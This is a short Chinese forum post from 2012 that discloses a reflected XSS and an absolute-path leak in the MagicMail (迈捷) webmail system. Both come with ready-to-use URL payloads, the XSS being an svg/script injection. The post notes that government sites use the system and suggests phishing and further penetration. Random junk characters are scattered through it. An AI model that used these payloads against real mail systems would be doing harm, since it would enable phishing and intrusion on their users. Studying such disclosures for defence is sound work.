今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
! ]/ n2 a1 B* {% n' `, d; p& s D6 Z: u$ Y; o2 p" O
' t6 U7 \6 [3 S* _! L7 F包含 一个反射性XSS 以及 绝对路径泄漏3 D0 G z- W; |0 }, G: b% z/ s
看了看 貌似全部是linux的。
1 |5 p3 _1 K5 A# X, R- S/ Q , q* R( r5 }6 O$ k, y: o7 U
关键字:迈捷邮件系统 by MagicMail, K3 |' @0 Z. x# t7 T
0 J7 @3 [) H# Y' D0 m3 I. J! j/ K6 v C( Y可以看到很多政府网站都用这个邮件系统
L; ^% @. k+ v8 K6 \6 G
2 C7 t1 B% U3 ^' J6 S' s9 d绝对路径 http://madman.in/index.php?login_type=declare&language=* D2 {5 O5 o* y, Q- ^; p: I9 a
+ `2 Z" e, b7 N4 E0 i6 B; F/ f
& F5 S, S, d! T8 N0 {
/ X1 b) s! K* M( w: L; oXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
' s. r' Z9 p9 w/ s$ P5 B4 P1 W9 M' R y; Z) U
5 D0 W4 ?5 s2 y' N+ f
% I P9 u$ z2 G2 ~( d5 ^
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等& m3 f( x! W: n* @$ e* t6 Q d$ p
5 S% Y: t7 y; l& V4 s
修复方案:看官方补丁吧。: d, r& a3 W2 `+ M" b" E% F. }5 {
|
发表于 2012-11-9 20:38:41
收藏
支持
反对